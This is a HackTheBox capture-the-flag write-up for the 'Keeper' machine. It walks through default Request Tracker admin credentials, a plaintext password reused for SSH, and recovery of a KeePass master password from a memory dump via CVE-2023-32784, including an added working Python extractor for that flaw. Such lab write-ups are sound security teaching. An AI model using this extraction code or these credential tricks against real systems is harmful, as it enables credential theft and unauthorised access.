Keeper Write-up

When your Danish dessert compromises the entire system

Pr3ach3r
System Weakness


HTB banner for Keeper: the machine name “Keeper” in the center, a scroll with a key drawn on it above the name, and the difficulty rated easy.

INTRODUCTION

Keeper is an easy machine on HackTheBox. Initial access needs no exploit: the Request Tracker (RT) instance on port 80 still accepts its default administrator credentials, and an RT admin page discloses a user password that is reused for SSH. In that user's home directory we find a KeePass memory dump and a KeePass database; the dump leaks the master password, and the database holds the root user's SSH private key. The last step may seem challenging initially, but it will be easier if you are from Europe.

ENUMERATION

First, check which ports the server exposes with nmap (-sV for service versions, -sC for the default scripts, -Pn to skip host discovery, -oN to save the output to a file).

#nmap command
nmap -sVC -v -Pn -oN keeper-nmap keeper.htb
#nmap response
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_ 256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s look at port 80.

The web page says — “To raise an IT support ticket, please visit tickets.keeper.htb/rt/”.
Redirecting…

The page tells us where to go next. Following the link to tickets.keeper.htb/rt/ (resolve the hostname through /etc/hosts, as for keeper.htb) lands us on the Request Tracker login page, and the version displayed there is outdated. A quick search shows that RT ships with a default administrator account, root : password, and it has not been changed here.
Request Tracker login page

Logged in as root, the admin area lists the RT users and a message about someone else’s KeePass. Looking at the user lnorgaard brings the second finding: the “Comments about this user” field on the user record stores the password in plain text: lnorgaard : Welcome2023!

The image displays the admin page with the password located in the “comments about the user” section.
Welcome2023!

INITIAL ACCESS

Only ports 22 and 80 are open, so the natural next step is to try the disclosed credential against SSH. It works: lnorgaard : Welcome2023! gives us a shell on the server without any reverse shell or exploit. This is plain information disclosure (a password stored in a free-text admin field visible to anyone with RT admin access) combined with password reuse between RT and the system account. The user flag is in the home directory.

The image displays the contents of the lnorgaard user directory, where user.txt is located.
lnorgaard user directory

PRIVILEGE ESCALATION

In the lnorgaard home directory there are two important files: KeePassDumpFull.dmp, a memory dump of a KeePass process, and passcodes.kdbx, a KeePass database. Copy both to our own machine (scp over the same SSH credential works) and install the keepass2 client.

The image shows the installation process of the Keepass2 program. The command used for this is “sudo apt install keepass2”.
keepass2 installation

We have two files and the keepass2 binary, but it is not yet obvious what to do with them. Searching for “KeePass memory dump” leads to CVE-2023-32784: KeePass 2.x before 2.54 leaves a recoverable trace of the master password in process memory, because the password box creates a leftover string for every typed character, so every character except the first can be pulled out of a dump. Running the public proof-of-concept against KeePassDumpFull.dmp gives only a partial result: **dgr*d med fl*de.

NOTE: I spent a long time searching Google and the HackTheBox forum until one comment brought me hope again. The master password we need is “rødgrød med fløde”, a Danish recipe.

The missing characters are all ‘ø’: the proof-of-concept only accepts characters from a printable ASCII set, so the non-ASCII positions come out as unknown (the first character is unknown by design of the technique, since it is never preceded by a mask character). With the full phrase we can open passcodes.kdbx in keepass2.
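Because the proof-of-concept’s ASCII filter is exactly what hid the ‘ø’ characters, here is an added Python example (editor’s code, not the author’s and not the public PoC) that reimplements the CVE-2023-32784 scan in a character-set-agnostic way. It assumes the behaviour the CVE describes: KeePass masks the password box with U+25CF (●), .NET stores strings as UTF-16LE, and every keystroke after the first leaves behind a string of N-1 dots followed by the N-th character. The dump it scans by default is constructed from the known phrase so the script runs offline; pass a real file such as KeePassDumpFull.dmp as the first argument to scan that instead.

```python
"""Added example: character-set-agnostic scan for the CVE-2023-32784 leftovers.
Assumptions (labelled, not taken from the write-up): .NET strings are UTF-16LE
in memory, KeePass masks typed characters with U+25CF, and the n-th keystroke
(n >= 2) leaves a string of n-1 mask characters followed by the n-th character.
The default input is a constructed dump, not a real KeePassDumpFull.dmp."""
import string
import sys

DOT = "\u25cf"                         # the '●' mask character KeePass draws
DOT_BYTES = DOT.encode("utf-16-le")    # b"\xcf\x25" as it appears in memory


def build_fake_dump(password: str, filler: bytes = b"\x00" * 16) -> bytes:
    """Constructed stand-in for a KeePass process dump (test input only)."""
    chunks = []
    for n in range(2, len(password) + 1):
        # leftover string for the n-th typed character: n-1 dots + the char
        leftover = DOT * (n - 1) + password[n - 1]
        chunks.append(leftover.encode("utf-16-le") + b"\x00\x00" + filler)
    # the fully masked textbox contents linger too: all dots, no trailing char
    chunks.append((DOT * len(password)).encode("utf-16-le") + b"\x00\x00")
    return b"".join(chunks)


def extract_candidates(dump: bytes, max_len: int = 64, ascii_only: bool = False) -> dict:
    """Map each password position (1-based) to the set of characters seen
    right after a maximal run of (position - 1) mask characters.
    Position 1 never has a dot prefix, so it is never recovered.
    ascii_only mimics a PoC that accepts printable ASCII only, which is
    what turns the 'ø' positions into unknowns."""
    candidates: dict = {}
    i = dump.find(DOT_BYTES)
    while i != -1:
        n = 0                                   # length of the dot run
        while dump[i + 2 * n: i + 2 * n + 2] == DOT_BYTES:
            n += 1
        nxt = dump[i + 2 * n: i + 2 * n + 2]   # the UTF-16 code unit after the run
        i = dump.find(DOT_BYTES, i + 2 * n)     # continue after this run
        if len(nxt) < 2:
            continue
        ch = nxt.decode("utf-16-le", errors="ignore")
        if not ch or not ch.isprintable():      # NUL terminator, lone surrogate, etc.
            continue
        if ascii_only and ch not in string.printable:
            continue
        if n + 1 <= max_len:
            candidates.setdefault(n + 1, set()).add(ch)
    return candidates


def render(candidates: dict) -> str:
    """Render the recovered password; '*' marks an unknown or ambiguous position."""
    length = max(candidates) if candidates else 0
    out = []
    for pos in range(1, length + 1):
        chars = candidates.get(pos, set())
        out.append(next(iter(chars)) if len(chars) == 1 else "*")
    return "".join(out)


if __name__ == "__main__":
    if len(sys.argv) > 1:                       # a real dump, e.g. KeePassDumpFull.dmp
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:                                       # constructed dump from the known phrase
        data = build_fake_dump("rødgrød med fløde")
    print("ascii-only PoC view :", render(extract_candidates(data, ascii_only=True)))
    print("unicode-aware view  :", render(extract_candidates(data)))
```

With ascii_only the rendered string is the page’s **dgr*d med fl*de; without it the ‘ø’ positions are filled in and only the first character stays unknown. On a real dump expect extra spurious candidates at low positions (any stray CF 25 byte pair looks like a one-dot run), so inspect the candidate sets per position rather than trusting the single rendered string, and remember that the first character never appears in the dump and has to be guessed.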

The image displays the command used to open passcodes.kdbx: keepass2 passcodes.kdbx -pw:"rødgrød med fløde" (KeePass expects the password directly after -pw: with no space; the GUI prompt works just as well).
rødgrød med fløde

Opening the database, we find an entry for the root user whose notes contain a PuTTY private key (a PuTTY-User-Key-File block).

The image displays the contents of the kdbx file.
PuTTY-User-Key-File

We can either load the PPK straight into PuTTY or convert it to an OpenSSH private key with puttygen’s private-openssh output format and then ssh in as root. Save the key text exactly as it appears in the entry, run the conversion with puttygen, set the resulting file’s permissions to 0600 (OpenSSH refuses a key that is group- or world-readable), and pass it to ssh with -i.

The image demonstrates how to use the Puttygen program to convert the Putty PPK file to a private OpenSSH file.
It’s done! We are ROOT

Now we can obtain our root flag in the root directory.

CONCLUSION

This machine seemed relatively easy at first, but it became more challenging at the final step, when the incomplete dump turned out to be a Danish phrase. The lessons are familiar ones: default credentials left on an exposed admin interface, a password stored in a free-text field and reused for SSH, a password manager’s memory dump left lying on disk, and an unpatched KeePass (the fix for CVE-2023-32784 shipped in version 2.54). I hope you find this walkthrough enjoyable. If you do, please consider hitting the clap button and following to stay updated on future posts.

Thank you for reading, and I’ll see you soon.


Welcome to my infosec journey. I'll share my CTFs adventures, and I hope you enjoy.